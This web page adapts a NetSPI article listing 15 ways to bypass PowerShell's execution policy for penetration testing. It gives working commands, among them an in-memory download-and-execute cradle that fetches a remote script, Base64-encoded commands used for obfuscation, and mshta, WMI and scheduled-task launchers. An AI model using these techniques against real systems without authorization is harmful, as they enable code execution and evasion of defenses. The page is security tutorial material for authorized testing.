Skip to main content

Bypass the PowerShell Execution Policy

💻 15 Ways to Bypass the PowerShell Execution Policy

Author: Scott Sutherland (summarized & adapted)
Original: NetSPI Blog

🧠 Introduction

PowerShell's execution policy is designed to prevent unauthorized or accidental script execution. However, there are many legitimate reasons to work around it — especially during penetration testing, red team exercises, or automation. Below are 15 common methods to bypass the policy, with explanations.

🔐 Bypass Techniques Explained

  1. 1. Paste Script Directly in Console
    PowerShell only applies execution policy to script files. If you paste code directly into the console, it bypasses policy restrictions entirely.
  2. 2. Pipe Script to PowerShell
    You can echo the script and pipe it to PowerShell’s standard input: 
    echo Write-Host "Hello" | powershell -noprofile -
    This avoids the need for saving the script to disk.
  3. 3. Read Script File and Pipe to PowerShell
    This loads a script from disk and pipes it in: 
    Get-Content script.ps1 | powershell -noprofile -
    Execution policy is not enforced when the script is read as input.
  4. 4. Download and Execute in Memory
    Common in red teaming, this downloads and executes the script directly: 
    powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://example.com/script.ps1')"
    This avoids writing anything to disk.
  5. 5. Use the -Command Argument
    Scripts passed via the `-command` flag are evaluated like pasted input: 
    powershell -command "Write-Host 'Bypassed!'"
  6. 6. Use -EncodedCommand
    Scripts can be encoded in Base64 and passed to PowerShell: 
    
$command = "Write-Host 'Hello'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded
    Useful for obfuscation and policy bypass.
  7. 7. Set Policy via Group Policy or Registry
    If you have access, change the execution policy via: 
    Set-ExecutionPolicy Bypass -Scope Process
    Or modify registry keys like `HKLM:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell`.
  8. 8. Use ISE (Integrated Scripting Environment)
    ISE sometimes behaves differently and may allow execution: 
    powershell_ise.exe script.ps1
  9. 9. Change File Extension
    Rename `.ps1` to `.txt` and read it into memory inside another script. This avoids detection and enforcement.
  10. 10. Use WMI to Launch Script
    PowerShell can be run via WMI methods that bypass policies: 
    Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell -nop -enc ..."
  11. 11. Use Task Scheduler
    Create a scheduled task that runs your PowerShell script. The execution policy isn't enforced in the same way: 
    schtasks /create /tn bypass /tr "powershell.exe -File script.ps1" /sc once /st 00:00
  12. 12. Use WinRM or PS Remoting
    When executing scripts remotely, policies on the target system may not apply, especially if executed as commands: 
    Invoke-Command -ScriptBlock {Write-Host "Hello"} -ComputerName target
  13. 13. Use DLL Injection or Reflective PE
    Advanced method: Inject PowerShell into memory via custom DLL or PE loader. Used by tools like PowerShell Empire.
  14. 14. Use Alternate Shells (e.g., MSHTA, wscript)
    Launch PowerShell indirectly from other interpreters: 
    mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -enc ..."":close")
  15. 15. Exploit Software That Invokes PowerShell
    Some tools like MSBuild, Excel macros, or installer frameworks may invoke PowerShell — which you can hijack.

These methods are intended for authorized security assessments, research, and automation. Use responsibly and within the bounds of local laws and organizational policy.

Last adapted from NetSPI: https://www.netspi.com/...

Back to top